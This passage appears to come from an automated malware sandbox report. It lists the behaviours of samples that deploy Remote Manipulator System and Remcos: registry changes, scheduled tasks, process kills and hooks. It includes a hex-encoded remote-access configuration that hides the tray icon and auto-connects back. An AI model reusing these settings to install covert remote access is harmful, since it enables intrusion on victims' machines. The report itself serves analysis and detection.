| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\System32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\TektonIT | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223730313230223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e5275737369616e3c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3661766a766755477a614d3d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e66616c73653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e66616c73653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e66616c73653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c6c6f675f7573655f77696e646f77733e66616c73653c2f6c6f675f7573655f77696e646f77733e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e5167413341444141526741774145494152414247414559414f41417a414445414e674242414545414e41417a41454d4152414132414551414f514131414559415251424341446b414e674179414545414f414134414430414e414130414451414e414130414334414e414178414451414e41417a414449414f414133414441414e41413d3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343538362e363131393838353138353c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349334d4445794d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e66616c73653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c636c6970626f6172645f7472616e736665725f6d6f64653e303c2f636c6970626f6172645f7472616e736665725f6d6f64653e3c636c6f73655f73657373696f6e5f69646c653e66616c73653c2f636c6f73655f73657373696f6e5f69646c653e3c636c6f73655f73657373696f6e5f69646c655f696e74657276616c3e36303c2f636c6f73655f73657373696f6e5f69646c655f696e74657276616c3e3c73686f775f636f6e6e656374696f6e5f616c6572745f666f725f616c6c3e66616c73653c2f73686f775f636f6e6e656374696f6e5f616c6572745f666f725f616c6c3e3c2f67656e6572616c5f73657474696e67733e0d0a | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={A12D8F7C-D7F5-483B-B90C-BCC15D5FB2ED}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\ieframe.dll,-5723 = "The Internet" | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\TektonIT\Remote Manipulator System\Host\Parameters | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\FUSClientPath = "C:\\Windows\\SysWOW64\\ruts\\rfusclient.exe" | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1734027696" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" | C:\Windows\system32\sihost.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Remcos\remcos.exe | N/A |
| N/A | N/A | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\XW.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\svchost.exe | N/A |
| N/A | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\random.exe
"C:\Users\Admin\AppData\Local\Temp\a\random.exe"
C:\Users\Admin\AppData\Local\Temp\a\client.exe
"C:\Users\Admin\AppData\Local\Temp\a\client.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
